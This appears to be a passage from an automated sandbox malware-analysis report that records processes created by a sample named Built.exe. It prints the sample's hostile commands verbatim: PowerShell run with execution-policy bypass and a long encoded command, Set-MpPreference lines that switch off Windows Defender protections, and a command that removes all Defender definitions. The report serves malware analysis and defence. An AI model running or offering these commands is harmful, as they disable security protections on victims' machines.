jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
                Source: 47SXvEQ.exe, 47SXvEQ.exe, 00000000.00000002.1714111175.0000000001074000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: AProgram Manager
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF6266695E0 cpuid 4_2_00007FF6266695E0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\_ctypes.pyd VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\blank.aes VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\libcrypto-1_1.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\libffi-7.dll VolumeInformationJump to behavior
